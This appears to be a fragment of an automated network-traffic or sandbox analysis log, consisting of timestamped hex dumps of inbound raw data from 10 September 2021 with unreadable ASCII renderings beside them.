f0 6e 1f 21 70 6b ae dc cf 9c 58 1f 4a fd 3b d0 f4 68 17 16 4c 48 23 c7 95 4a ae 5b c8 17 b1 20
                                        Data Ascii: )if39t#1q1wkg:~T:=SR2$GI$pE5xIQNKPTAoVkH?N`JSegiC, %WIO&F>]Lpv)O{F'L,ZEHGFX="x-QKwan!pkXJ;hLH#J[
                                        2021-09-10 09:33:46 UTC37INData Raw: 1e d6 23 69 2b 40 f3 d2 b8 d5 35 d9 4b 20 12 05 ad b5 3d 9e 3b 2f fe 33 85 41 2e 6c f7 b5 ad ea 2a 2a f1 a1 f4 0f ea fe 87 eb 5f 4b 61 7a 8f 07 2a 32 fe a2 d5 b5 cc cc 42 65 86 db 1a 1c e9 61 85 11 51 88 58 9b 15 16 66 63 65 9e 41 cf 3c 31 25 0a 5c b7 96 a5 20 24 5c e7 e7 5a f2 a0 36 8f 4f 9a 12 b0 95 00 b0 a2 28 f4 0f 6a 8d cf 9d 61 df eb 1f ab 3a 67 a6 b0 61 79 35 1c 75 cd ca 30 e0 e0 44 d2 20 99 b2 73 19 62 87 b4 a8 41 0a af 6c ec 17 f6 a9 fc 75 5d 37 8a 58 51 48 05 d3 e1 7d 4f ef 95 c0 6a 43 a9 94 82 00 05 81 0e d4 27 d5 cd b7 f4 8f be 96 f5 f6 26 b1 af 36 3c 19 63 2b fc 0f 18 0c d9 99 dd d1 f5 4c 88 c1 78 42 a0 55 ff 00 86 c7 06 53 bf 73 5c c8 68 58 3d 37 2a 72 95 2c a8 50 d2 ed ae 8d 56 f7 bc 75 52 e5 cb c2 4a 99 ed 4d 0b f2 f2 82 ed 63 59 c3 77 92
                                        Data Ascii: #i+@5K =;/3A.l**_Kaz*2BeaQXfceA<1%\ $\Z6O(ja:gay5u0D sbAlu]7XQH}OjC'&6<c+LxBUSs\hX=7*r,PVuRJMcYw
                                        2021-09-10 09:33:46 UTC39INData Raw: a5 fc 40 b2 54 94 b8 34 27 b7 b0 f8 80 a4 2d 8d a9 4d 8a cc 64 c7 c9 46 fb 7c 94 92 35 40 56 59 25 8d 24 5f fa e1 b5 8e 87 35 e0 71 d1 56 4e 17 50 77 b6 5d f3 e5 d1 54 61 42 8a 19 d2 a3 e1 d8 8a 13 7d e8 7d 22 48 e5 48 b9 78 f9 1d c9 0c 43 27 12 75 03 73 73 97 fa 2e 0d 0b 05 5c 7c 55 73 c0 b1 d7 25 aa 59 49 01 2c 75 06 b9 8b 16 a7 cc 79 69 50 38 83 35 9b 63 7e f6 e9 0c 9c 5c c7 c3 c9 c7 ec 48 e9 1a 65 bf 6c b5 6d fb 7c 85 1b ad 47 36 1b 70 36 4f 8b 3f 1d 0d 78 ac ec 08 a8 a5 76 e5 ae b0 4c 60 61 0d 84 93 c8 be 5c f9 fc c5 85 fa 5f ae 2c f3 65 69 59 51 ee 04 49 03 47 b8 c7 14 8b 36 d1 1c c5 cd 31 68 9b de a2 bc f8 3e 3a f4 b7 72 1f 27 1b 1b 77 cd b2 85 26 a0 a8 e2 50 71 5a 35 3b 7e 7d 22 f8 7d 30 f5 06 3e 26 0b e1 fe ac f3 63 42 b0 e4 34 de f2 64 89 f6 ee
                                        Data Ascii: @T4'-MdF|5@VY%$_5qVNPw]TaB}}"HHxC'uss.\|Us%YI,uyiP85c~\Helm|G6p6O?xvL`a\_,eiYQIG61h>:r'w&PqZ5;~}"}0>&cB4d
                                        2021-09-10 09:33:46 UTC40INData Raw: a5 b5 61 5b c5 a4 bc 25 2c 54 41 2e df 01 b9 d7 d6 18 43 d7 f8 7a 27 dd c6 ce b1 40 ec 21 02 49 14 45 59 1b 42 db 35 6d de ae 76 dd 1d fe 2a ba 51 69 53 94 91 b3 8d f7 b7 a6 9a b4 58 cb 57 db 97 5f 11 a5 49 ad 41 b0 0c 34 f9 30 09 9d fd 44 7a 7f d2 da 8e 3e 87 93 9f 1a 3a e3 c8 d8 4f 3c dd a1 52 12 b1 c0 ee cc 29 e2 c8 e1 18 5a 85 91 18 1a 6a 30 32 15 3c 84 cb 49 2f e7 76 a6 b6 f3 d0 3c 4c f1 89 4b ae 6a d2 92 2a 00 50 67 a5 df bd 0c 24 7e a8 ff 00 5c 1e 9f c4 f4 ab 27 f8 ac 30 6a ba 7b c9 11 08 ed 24 e5 77 32 4e 90 c3 13 33 ca d8 d2 ad 4d 10 16 51 ac 02 48 1d 58 70 1f 44 e3 27 4d c2 99 65 89 f0 9a bb 6e 05 28 6b d2 29 fe a1 fe a4 e1 38 54 87 98 09 17 18 9d b3 d0 e6 ed f3 15 83 27 ff 00 6a 5b e2 e9 59 da 37 da e7 4f 3b 42 62 8b 22 20 c9 04 d0 04 3d a5 25
                                        Data Ascii: a[%,TA.Cz'@!IEYB5mv*QiSXW_IA40Dz>:O<R)Zj02<I/v<LKj*Pg$~\'0j{$w2N3MQHXpD'Men(k)8T'j[Y7O;Bb" =%
                                        2021-09-10 09:33:46 UTC41INData Raw: 8a 8a ee d6 a3 d5 b9 12 3a 67 e5 95 60 f5 d6 9b 91 99 98 9f 66 8d 34 98 12 38 8d d5 54 76 a3 c8 85 a1 c8 db 26 d6 12 49 20 2b b5 ae fb 28 57 cb 74 d4 89 a9 25 9e 81 c0 dc d6 97 f2 8e 2e 52 8a 42 88 04 ef a8 ea fa f2 3e 70 84 d7 3d 0f 97 a8 f6 cb 33 62 45 0e 53 34 c2 ca 3e e5 56 64 62 2c 1a 90 1b 60 37 2b 1a b3 7c 74 e2 54 93 4a ed d9 bd f6 b1 d2 02 bc bc e8 6b 4e 99 5f ce 04 72 7e 9e fa 75 0c 32 65 e2 c5 9b 2a 20 57 ee fb 90 d0 3b 49 05 88 24 b7 34 41 22 f8 af 83 30 a1 24 84 80 03 0a 3e 75 be b9 01 f3 0a 2b f9 2a 99 9a 6d 13 f8 1a 7e 16 99 8a 82 28 a3 c5 8c 01 ba 38 23 45 25 81 f6 01 c7 80 9c 13 e7 f1 d7 66 2c 2c 06 52 a9 46 7d cf 2c a9 e9 ac 78 84 84 38 03 1e 26 e4 29 db fa 5a 05 7d 5d f5 13 40 f4 8e 9f 95 a8 6a 5a 86 2e 14 18 d1 cb 24 f2 49 3c 68 fd b4
                                        Data Ascii: :g`f48Tv&I +(Wt%.RB>p=3bES4>Vdb,`7+|tTJkN_r~u2e* W;I$4A"0$>u+*m~(8#E%f,,RF},x8&)Z}]@jZ.$I<h
                                        2021-09-10 09:33:46 UTC42INData Raw: 0a fe 05 74 cc 90 a7 4a 6f a8 fc 6f ae b5 8a b9 cd 55 12 c4 ba 70 e5 e5 7e 64 e6 63 93 df d4 5e 64 72 6b 52 a9 9b 6e e5 46 51 c1 12 1d 83 79 f3 57 ee e5 6b fb 7f 3b 7f a5 4b 4e 00 c5 e8 09 f5 24 5b 22 1b 93 e7 1f 3d fa dc d2 89 c4 0a bd 18 ee 6e 2a 33 2d ef 68 0a f4 f2 41 17 a7 fd 50 d3 76 c4 03 4c d0 74 f6 09 4a fb 32 f5 0e e4 b1 70 3d aa c8 bc 8f 3c 9b be 9a 41 51 e2 81 56 4a 6c ed 51 ae 77 fc c5 47 84 48 29 06 e0 9f 4b 0a 65 5c bc a0 8b e9 5e 30 9b 4a ca f7 01 b7 5c 99 f1 d2 30 c5 c4 4e 88 46 e2 28 7b 54 8a be 38 e7 c1 ba ff 00 ab 4c 22 66 1a 1b b7 e7 2b 7e b5 82 fd 3c 15 5e 82 dc d8 da bc fb 30 f5 81 31 a6 8a 28 25 92 68 0e 4a e4 60 34 8c 8b 22 99 5a f2 71 9d 53 ce f8 5d 08 22 ec ee b1 43 8e aa 25 2b c6 45 19 45 aa 2d 5b 53 2b e4 5e 2c a7 06 41 21 c9
                                        Data Ascii: tJooUp~dc^drkRnFQyWk;KN$["=n*3-hAPvLtJ2p=<AQVJlQwGH)Ke\^0J\0NF({T8L"f+~<^01(%hJ`4"ZqS]"C%+EE-[S+^,A!
                                        2021-09-10 09:33:46 UTC44INData Raw: 92 db ea 3c 93 cf a0 69 5a 34 4b b0 66 49 36 74 ac c5 83 08 f0 63 66 8e 30 41 03 99 9d 19 ae bf 60 bb ae b8 95 04 b9 6a b5 f4 20 75 cc bf 2e 91 02 71 2e 8f 71 ff 00 f2 9b 64 d6 ad 28 23 9c 3f 58 b5 8c 4c cc 5d 0f 0a 74 dd 97 87 1e 5e 14 93 1f 70 79 1b 78 70 41 16 2c d1 22 c8 35 c7 15 d2 25 8d 71 d7 91 1c e2 c2 5a 9c e6 06 99 1e 5c b5 e9 14 b7 d5 ef 2c 52 e6 63 e3 17 9a 18 71 62 56 00 0a 8e 54 85 d0 8f c9 5a 22 85 71 76 7c d7 44 42 b1 03 95 c5 41 63 6e 7c ea fe 75 83 10 10 41 48 2e 40 24 dd 9d bd 33 af f4 23 85 8e a3 17 11 56 31 26 4b ca 1b 22 71 ee 08 ab 8f 23 b4 66 35 1f b5 42 ad b0 f0 6b f1 d0 55 72 fd fe b4 86 d1 89 3e 22 71 24 e4 28 6f ce a4 f7 ac 46 66 43 10 4c af b9 94 63 e3 cf 8d 1b f7 99 37 14 8d ec 7b 4f ee 3c 91 c1 20 d0 35 c0 ea 48 77 a7 96 bd
                                        Data Ascii: <iZ4KfI6tcf0A`j u.q.qd(#?XL]t^pyxpA,"5%qZ\,RcqbVTZ"qv|DBAcn|uAH.@$3#V1&K"q#f5BkUr>"q$(oFfCLc7{O< 5Hw
                                        2021-09-10 09:33:46 UTC44INData Raw: 1a 8f 90 2a ba 12 d2 a4 53 3d 46 44 8f 83 e9 58 b1 97 3d 18 49 29 20 b1 ad 1c 1c 8f 5e 43 90 8a e5 f5 47 eb 36 1e 1e 9f 9b 89 90 f9 58 99 4f 8c c9 26 3c f6 9d e5 8d f7 63 ca 84 80 19 a1 73 b4 ae e5 3d b0 09 ae 8f c3 70 9f 72 72 50 b2 08 50 77 d1 f6 a7 5f 2c e1 4e 3b ea 5f 66 5b e2 62 06 5a b6 af 53 af 31 48 e6 a7 ac 7e ab fa 87 d6 5a 82 c7 93 99 da c4 d3 23 91 60 79 d9 a3 c8 c9 55 20 c7 0c 79 22 42 c5 4b 20 2a 59 b7 10 16 cf c7 5b 5e 0b e8 fc 34 96 74 82 5c 65 f9 d3 31 d6 3e 7f c7 7f a8 78 89 8e cb 52 30 b8 a9 b8 f9 6e f3 22 ba fa 9b d6 12 e4 64 6c 83 26 49 33 c4 ac b3 47 3f eb 92 c0 32 b4 8a ea ad b4 ab 10 5d b9 67 03 9e 6c f5 7d 29 12 b8 60 0a 10 02 85 01 61 41 95 ff 00 1c b4 8c 8f 17 c5 ce e3 16 01 52 aa ac dc 5f 97 cd 35 ac 4e 7a 07 e9 47 d4 ef a9 f9
                                        Data Ascii: *S=FDX=I) ^CG6XO&<cs=prrPPw_,N;_f[bZS1H~Z#`yU y"BK *Y[^4t\e1>xR0n"dl&I3G?2]gl})`aAR_5NzG
                                        2021-09-10 09:33:46 UTC46INData Raw: 76 1b a3 6a 0c 48 dc 6c 0f f2 a5 79 1c f0 3a ab 5b a5 c5 c0 ab 5b 77 f6 ee 91 a0 48 c6 90 a2 42 43 7b 51 8e f7 ae f0 a5 d7 a2 15 2c 6a 58 99 d5 8e c9 0d c7 61 81 65 61 c8 be 29 54 f1 6c 47 48 29 6c a1 b1 34 15 f7 f4 a7 2b 56 25 c8 29 04 57 33 a3 e7 a7 bd b6 84 27 a8 71 e2 59 24 94 27 66 28 9d c9 8b ba 3b 52 3e d3 b8 95 fd e4 6f 3f e5 22 aa 80 f9 e9 ee 1e 57 f9 31 63 50 2a 48 d4 fb 6b 98 a4 2b 36 79 48 fb 79 8c e9 67 fe e1 1b ea 2c c6 9a e2 40 46 f5 60 42 da ab 32 55 95 3c d5 02 a0 8b e7 ff 00 2b 04 84 82 ed ef df 77 d4 58 c2 cd 99 85 4d 35 1d 6f 98 7b 9e a2 3a 8e 2c 7a 7e 3b 67 64 3a b0 45 b6 a3 fb 50 c6 2c 6d ff 00 3b 2b 78 3e 7e 4f 8e 87 34 9b 27 cb 31 d8 3e e6 24 03 e6 c0 3e 55 e6 7f bc a2 a7 7d 46 fa c3 97 89 32 e9 3e 94 d3 25 d6 f5 c9 98 c1 a7 e9 f8
                                        Data Ascii: vjHly:[[wHBC{Q,jXaea)TlGH)l4+V%)W3'qY$'f(;R>o?"W1cP*Hk+6yHyg,@F`B2U<+wXM5o{:,z~;gd:EP,m;+x>~O4'1>$>U}F2>%
                                        2021-09-10 09:33:46 UTC47INData Raw: 8c 15 90 29 2c 00 a0 47 bb 69 e4 8e 41 af 35 d7 28 2c 37 a0 fc 77 a6 c3 6f b8 94 90 58 56 a4 3b bf 2b 5b 37 e5 14 cf d4 98 f8 f1 4b ac 19 d6 9f 3a 24 86 3f 21 67 79 0c ae 37 28 1c 37 69 80 a6 b5 f1 f2 7a 6a 5a c1 a3 55 db a1 1f 9a 40 e7 58 00 42 99 22 a3 b1 6b e7 eb 14 93 d6 19 27 13 4d d4 70 41 13 3e 8f 9d 99 a7 14 20 a4 81 5e 46 7c 57 76 1e 48 49 0a ad 73 4b d5 a4 84 84 b9 39 d1 f7 d6 b9 45 1f 10 aa 36 8f 6e 57 e9 e7 1c ba fe a1 b7 4f a9 e2 ee a0 15 91 99 d5 6c b1 50 11 8f e3 da 3c d7 e0 93 f1 d6 cb e9 4c 89 45 4a ff 00 ab 8d fc f9 d1 d9 ea f7 8f 9c 7d 79 d5 37 c2 59 a9 5a 5a bf 8e b4 d6 20 1a 5c 5c 2f a7 da d6 62 9f b8 92 6d 43 4a c8 86 38 8d 77 57 0b 1f 67 61 ae 89 1d e2 ae 54 92 4e e0 b7 f1 d3 32 d8 ce 76 77 35 f3 0c 3a 57 9d 69 15 1e 21 2d f1 50 83
                                        Data Ascii: ),GiA5(,7woXV;+[7K:$?!gy7(7izjZU@XB"k'MpA> ^F|WvHIsK9E6nWOlP<LEJ}y7YZZ \\/bmCJ8wWgaTN2vw5:Wi!-P
                                        2021-09-10 09:33:46 UTC48INData Raw: 7e 68 7f d9 b9 88 21 36 62 de 6f 4b f3 80 cb 0e a0 fb 3f 5a 1d a3 52 7c 62 b2 a0 45 65 2e 77 00 1a c0 21 7d e4 92 7c 16 3f fc ff 00 1d 55 ab f9 1d 1c e7 be 9b 33 f3 31 64 52 4c b0 46 4c 4f 91 ef da d0 15 a5 e3 ae 57 a8 35 cc f9 44 97 00 87 02 24 71 68 f1 c4 84 c8 45 df ef 92 ec 8f 20 01 66 ba e8 49 67 03 5d a0 49 55 d4 3f c6 e7 4e f6 85 bf aa 66 83 26 5d 61 53 df fe 1d 87 92 23 06 cf 65 9c b3 cb 47 fe 92 88 14 71 77 cd 57 9f 14 29 8d 3d 8e 51 d9 0b 42 e6 33 bb 1b 87 bf cd 5e 39 03 f5 0f 53 12 6b 19 41 dd 66 31 e7 4f 2a a8 92 d0 82 e0 11 e3 f7 12 7f b8 03 92 07 4a 99 49 05 8a 8f 96 54 e9 9b fa 31 bc 5b 25 20 02 47 af e2 9e d1 5e 35 bc f8 a7 97 53 28 84 06 ce 83 1c 90 78 62 d0 ae e2 0d 56 d2 4e d3 f1 62 af cf 5c 57 fc 78 5a 80 de ae ef 47 6b 80 df b8 9a 06
                                        Data Ascii: ~h!6boK?ZR|bEe.w!}|?U31dRLFLOW5D$qhE fIg]IU?Nf&]aS#eGqwW)=QB3^9SkAf1O*JIT1[% G^5S(xbVNb\WxZGk
                                        2021-09-10 09:33:46 UTC49INData Raw: 46 cb f4 d7 af f4 df 44 33 fd 61 ce 6c 2f 51 62 ea be 9f d2 f2 7d 57 8f a9 7d b4 ba 6e 9f 9b f6 e9 3f 77 49 98 cf 8d 02 2b c4 9e e7 1a 6e 1b 8e 3c 22 53 e2 04 e1 29 28 20 b1 05 25 26 cd 77 3c ab 58 ad e2 b8 65 4d f1 29 6c 15 49 6a 03 16 15 12 c1 40 31 4f 85 a8 e2 ec a7 60 41 e8 87 f5 2d 89 ff 00 da e6 7f a5 b5 cd 57 d3 fa 46 9f a8 e8 1e 93 d3 7d 31 93 9f f6 6b 06 4e bf ab 98 43 6a 5a ce b1 a8 4e 9b f2 b3 e6 36 31 fd 91 43 8d 12 88 a3 50 00 eb 3f f5 bf a9 cb 98 b4 26 5b 12 7f f2 80 08 c3 40 0e 55 ad b9 45 87 d1 f8 59 f2 e6 8f 12 b0 da a7 2f 72 2e ff 00 02 00 be 8f ff 00 ec e3 d6 7e ba fd 38 f5 07 ab 7d 29 3a e8 da ff 00 a4 b5 ac 8c 8d 1b 31 21 71 1e 5e 46 32 47 27 62 29 62 36 a5 59 4e d9 17 69 de 03 29 07 ac b7 d4 27 ca c0 25 a2 8a 20 65 b5 5b ba 1c e9 4f
                                        Data Ascii: FD3al/Qb}W}n?wI+n<"S)( %&w<XeM)lIj@1O`A-WF}1kNCjZN61CP?&[@UEY/r.~8}):1!q^F2G'b)b6YNi)'% e[O
                                        2021-09-10 09:33:46 UTC51INData Raw: c4 87 27 16 39 9b 04 ba 29 9b 23 73 06 ac c9 69 86 dd ce 90 29 65 57 63 6d d6 d1 2a 29 90 93 38 84 13 85 00 03 77 d0 82 d7 6d 6c c6 3e 4b c6 4c 42 e7 2b ec 25 d2 1d 4a 5d 88 23 63 51 43 6f 9b 52 5f ad 1e 86 ce 83 fa a7 f5 de b3 96 20 8b 17 4f c1 d2 b4 7c 3c 71 ff 00 35 71 9a 34 65 ec 23 03 41 a5 66 dc 54 57 16 79 eb 51 c2 32 38 2c 29 ff 00 20 5e d4 f9 7e be 91 f3 ef a8 85 cc e3 4a d6 a3 99 15 37 d6 ef eb 9c 73 8b fa f6 f4 57 ad f0 72 f1 f5 fc 8d 2f 3b 51 fa 7f fe 1a 98 52 46 cb 2f 63 16 5c a8 44 39 4c 04 43 74 4c a6 8a e4 58 68 de 98 50 be af 78 09 73 04 81 31 28 0a 39 92 ce d7 7a d6 97 cf 36 b4 65 78 d9 c8 33 8c b5 4c 20 bb 25 24 28 8f 2c b9 da dd 26 fe a0 7f ed 23 fe ba 7f af 1d 53 e8 af d3 5f a9 df 50 b0 b5 6f 48 7d 3c d2 fd 0d e8 7d 27 d1 1e 96 f4 3e
                                        Data Ascii: '9)#si)eWcm*)8wml>KLB+%J]#cQCoR_ O|<q5q4e#AfTWyQ28,) ^~J7sWr/;QRF/c\D9LCtLXhPxs1(9z6ex3L %$(,&#S_PoH}<}'>
                                        2021-09-10 09:33:46 UTC52INData Raw: a4 46 ca ca c0 70 f6 60 7c 7c 89 25 c7 78 a8 f1 ec 90 a3 ab 1e 54 90 47 00 1e b4 09 64 a5 2a 50 60 43 8b 90 06 46 9a f5 6f 36 a7 29 2a 04 0d ae 46 bf af cc 45 fa 97 1e 06 d2 e3 d4 b2 52 0e e6 06 b4 98 19 31 83 52 2e 9f a9 63 98 1e 48 c5 15 0a 99 90 ef 91 c9 da 08 b2 77 57 4e 48 52 b1 50 16 26 80 9a 12 33 6e be 50 8f 13 2d 83 aa 8c 08 f3 cd fc fd 1e 91 59 bd 40 e8 b2 cf 81 34 35 f6 7f 75 84 b3 20 15 2c 41 fb b0 33 9f dc db 5c 90 af c8 0a 7d be d3 d5 da 0b 21 b3 3d 1a e3 30 d6 6a d3 9d 22 8e 69 75 3b 06 0a 70 40 6f 9e af f8 8d bd 2d a1 cf d0 21 87 b7 2b b7 d9 cb 8b da ee 0a 79 71 e5 69 60 97 93 63 62 3b 46 03 51 a0 07 c5 74 ba 88 94 b0 ab 07 72 74 d9 9a ee ed 06 48 fb b2 d4 05 7d 48 e9 7d a9 96 46 26 61 9f b7 8d 13 b2 53 60 e5 26 2c d1 92 c5 c4 2e c8 9e ef
                                        Data Ascii: Fp`||%xTGd*P`CFo6)*FER1R.cHwWNHRP&3nP-Y@45u ,A3\}!=0j"iu;p@o-!+yqi`cb;FQtrtH}H}F&aS`&,.
                                        2021-09-10 09:33:46 UTC53INData Raw: ae 7c fa 69 00 fe aa c6 c5 c7 d2 d1 90 03 26 51 8e 94 92 15 d4 10 14 86 e0 d9 92 c5 30 a0 0d 73 c0 0e 49 ff 00 c8 8a 8b 82 4e 4c 33 e5 02 e2 4a 08 00 30 55 2b 47 bd 6a c3 ad ef 46 81 ad 4f 04 c9 8d a3 1e e2 f3 89 10 91 03 7b a2 38 d9 06 53 63 8b 0a 09 52 47 8a e9 94 97 9e b2 08 3e 15 00 46 a0 db bb c5 7a 92 2f 6b f5 cc 77 9c 69 68 39 0b 9e 4b 85 b9 23 ca ce 10 db b6 d6 89 5b 78 45 36 0a fe 7e 3e 08 fe 43 c4 02 08 51 17 3c ae 40 e7 bd a0 b2 ac c3 30 3a 53 2f 3f 37 80 9f 57 ee 6c 06 0f b8 89 66 a7 20 fe 65 01 87 35 75 7b 4d ff 00 a0 be ac 78 26 6b 83 fc b9 d6 dd f9 56 2a 78 b7 c4 74 7f c8 fc 47 ed 1f 74 5e 9d 90 cf dc 37 a8 62 fd ba 10 4c 66 28 b0 a6 f6 a1 ab dc 0b 96 70 dc 81 5d 37 39 5e 2d 9d bd 2f ed 01 40 21 38 b2 39 e5 a5 ed 0c ff 00 e9 cf 02 59 fd 5b
                                        Data Ascii: |i&Q0sINL3J0U+GjFO{8ScRG>Fz/kwih9K#[xE6~>CQ<@0:S/?7Wlf e5u{Mx&kV*xtGt^7bLf(p]79^-/@!89Y[
                                        2021-09-10 09:33:46 UTC55INData Raw: e3 5c a3 5d c7 5d 8d 1b 00 0b b9 8d 83 71 d6 13 ea 9c 34 ce 16 71 28 51 c2 9d 3f cb a0 3a 79 35 ae df 4e e0 44 ce 23 87 96 b9 89 a9 4b 58 b7 56 de a1 c5 45 f3 88 2f 50 7d 34 d4 fe 97 7a a7 51 f4 7e a8 b3 4f a5 cd 22 6a 1e 99 d5 25 06 4e ee 99 94 cc 04 7e e5 2b 23 40 54 2b b2 1e 00 1f 82 7a 0f 07 f5 00 a0 ca ba 73 37 24 d3 bb c0 38 ce 08 e1 24 06 36 b3 3d 28 d6 6b d8 7b 46 5f 48 69 a3 07 d5 31 b1 8e 8c ac 63 67 56 31 ad 29 dc 09 55 a2 49 0a 4b 03 c1 fe dd 31 c4 4c 13 a5 ac 97 7c 22 b6 73 a8 f7 e7 5c a9 53 c3 25 68 9b 84 96 00 e7 4f 42 33 f5 d0 47 48 fe 9a c3 28 8f 18 42 ef 72 48 81 45 20 50 c6 9d 69 54 ee 2a c5 68 fe 2a 89 e6 ba cb cf e1 e6 2e 61 29 34 6c b3 6f 2f 4f 56 8d c7 05 30 09 68 4a 88 ab 73 ae 77 d7 a3 03 1d 16 f4 3b 46 f8 78 d8 d9 72 3b ac 2a 0e
                                        Data Ascii: \]]q4q(Q?:y5ND#KXVE/P}4zQ~O"j%N~+#@T+zs7$8$6=(k{F_Hi1cgV1)UIK1L|"s\S%hOB3GH(BrHE PiT*h*.a)4lo/OV0hJsw;Fxr;*
                                        2021-09-10 09:33:46 UTC56INData Raw: cb 2b 02 92 84 92 ea 15 09 35 2d 93 5f 9b d3 db ab df d3 4f d0 3c 0f a4 7f 4a b4 dd 33 55 c7 11 6b b9 58 83 52 d7 09 54 0e 99 79 7f f1 59 3b 98 5d a4 6e fb 01 04 d2 af 27 83 54 1f 59 22 6a d6 71 5a 8e fa 13 e4 ed e5 a4 6e 3e 84 89 d2 78 74 24 24 97 59 35 15 16 0c cc fd ed 0b 3f ea 3b d2 f8 9a c6 83 38 8f 08 67 e1 dc aa 1e 23 b1 db 72 15 63 1b d1 56 ad c4 ed ff 00 36 db 06 ba c3 71 1c 5a a4 96 0b 48 62 58 e2 d0 0d 4b 1e e8 2f 1f 4e fa 6f d2 d7 c5 99 6a 99 2c 80 02 4f f1 60 e4 e6 40 a6 7b 88 fe 7e 3e af 7f 4c 7e 8f cd 9b 5e d4 b2 e6 95 35 5c 99 24 96 19 31 a2 65 96 36 43 ff 00 0e 8d b1 18 4b 33 7e d3 6b 7c 53 1b 3d 2d 2b ea f3 81 c5 8c 38 d4 86 6d dc e6 dd 98 d3 cf fa 14 85 4a fb 41 22 c1 94 91 65 73 03 6f 33 15 cb d0 5a 3f d5 5f a4 5a b0 73 a5 65 6a da 2a
                                        Data Ascii: +5-_O<J3UkXRTyY;]n'TY"jqZn>xt$$Y5?;8g#rcV6qZHbXK/Noj,O`@{~>L~^5\$1e6CK3~k|S=-+8mJA"eso3Z?_Zsej*
                                        2021-09-10 09:33:46 UTC57INData Raw: c9 95 f3 34 cc b2 cc d0 e3 c5 34 59 3b 54 c8 e1 59 ec ed 3f f3 19 0d 21 22 a9 1c 13 75 7d 0f 8b 40 28 71 52 03 78 5c b6 1c b3 eb ef 06 e1 14 53 e1 51 1f c8 b9 ef bb eb 0d 39 65 19 de 9b d2 72 58 dc 91 cd 36 14 ab 61 da 24 95 7b 91 92 7e 23 ee 2a 90 0d 56 e2 3a ad 96 70 ad 21 ae 6c 77 ab b6 de 9c a2 df 88 29 32 80 0a 4d 52 e6 af 56 15 a7 e3 a0 ac 42 68 b2 47 16 3c f8 08 df a1 1e 47 dd aa b8 36 ab 98 ff 00 01 47 21 26 14 df 8b b6 e9 a9 83 3b 37 b7 56 b4 27 28 90 35 cb da 08 83 07 50 0b 14 57 69 23 14 c4 1d ef 1c 81 41 14 7f f8 a8 bc 11 fc 7c f5 09 29 48 c4 71 6f 52 0d bd a8 dc f4 8f 2f 10 20 10 43 dd c1 ab bf 2f 78 34 f4 ba cb 8f ae 02 e1 d6 0c b8 f1 7b 2e 41 da 18 c3 c2 7b 8f 00 ca 8e b7 f0 de 05 f2 61 37 3a 8a b7 a3 3f 3e 9d 4c 46 58 98 66 29 27 f8 eb 95
                                        Data Ascii: 44Y;TY?!"u}@(qRx\SQ9erX6a${~#*V:p!lw)2MRVBhG<G6G!&;7V'(5PWi#A|)HqoR/ C/x4{.A{a7:?>LFXf)'
                                        2021-09-10 09:33:46 UTC58INData Raw: ad de a2 fa 45 95 aa 47 92 fa 6a 7d 96 0e e6 7c cc f9 21 5f bb cc 21 88 19 13 49 b7 84 5e 57 1e 05 0a 80 fb b6 9e 0f 5a 2e 12 72 51 c8 d3 5e dd 8d 47 5d 0e 7f 8e 90 b5 3a ec 5b 6a f5 1e 5c a2 95 7a 87 d0 da 9e 83 a8 e7 eb 58 8d 3c 60 e4 11 09 81 5d a6 68 f7 98 a0 12 c9 40 34 d3 84 79 1e 30 c1 16 33 4c e7 8e b4 f2 42 66 23 c5 40 40 3a b0 61 e4 c3 f3 9b 8c e9 c5 29 78 d3 42 0b fe fb b4 31 7e 9a 7d 54 f5 b6 16 74 98 fa 66 06 a1 9b 89 19 c5 1a 84 f9 20 c5 8d 82 53 26 33 1b c7 2e ed 8d 29 48 fb 62 08 99 ca 80 6d 87 8e 83 c4 7d 3e 56 1f b9 2c 56 a5 c5 f5 dd fe 1a 2e 78 4f aa cd 2d 2e 64 bc 49 60 0b e6 1f d6 8f bf 95 7a 2d f4 cf fa d1 3e 8c ca c4 5d 5c 4d c6 4b ae 51 92 6d f8 22 2d a5 0c 5f 6b 33 15 92 45 3b 24 16 56 80 63 f8 ea ba 4c ee 26 51 3f f1 95 25 2a 6e
                                        Data Ascii: EGj}|!_!I^WZ.rQ^G]:[j\zX<`]h@4y03LBf#@@:a)xB1~}Ttf S&3.)Hbm}>V,V.xO-.dI`z->]\MKQm"-_k3E;$VcL&Q?%*n
                                        2021-09-10 09:33:46 UTC60INData Raw: 50 55 64 6b 50 2f ba 4d bf 02 89 35 5d 3f f4 b1 85 db 50 72 d5 9b 48 ab fa bf f1 ee ed f8 cf b1 fb 5e d2 fe f7 56 c7 c1 11 0d b3 ca 49 08 cc c5 02 ae e2 0b 35 80 9b ab c7 c7 90 3a 73 88 f1 29 f5 a6 ae 46 5d 6f e5 78 a8 e1 17 f6 4e 2c 8b 90 2d 6f 4a 77 9c 3c 34 8d 06 1c 0d 22 44 c7 8d 23 ac 45 12 4b 56 43 a6 d6 79 03 dd 58 50 ca a2 bc 9f cf 1d 2c c7 30 60 a6 6a 26 2f 16 86 ff 00 03 ba bd 29 15 d3 eb 9f d0 2f 55 7d 55 f4 6b e3 fa 77 56 8f 46 8d 64 92 56 ff 00 87 12 b4 b3 85 98 40 b9 4c c8 fb 93 6b d2 a2 86 df 34 94 79 02 99 e1 38 55 fd c1 3f 21 57 1a 3b d7 f3 b7 28 b4 fa 67 d6 b8 4e 0a 69 44 f9 60 a4 a9 9c d8 b9 ae be 75 d7 68 a3 d8 df 47 bf a8 8f 4f e7 7a 63 3f 3f d7 0d 26 7f a2 c6 2e 16 8d a9 e6 63 c7 aa ff 00 87 e2 e9 30 4d 0e 36 32 e9 59 30 0c 42 63 c3
                                        Data Ascii: PUdkP/M5]?PrH^VI5:s)F]oxN,-oJw<4"D#EKVCyXP,0`j&/)/U}UkwVFdV@Lk4y8U?!W;(gNiD`uhGOzc??&.c0M62Y0Bc
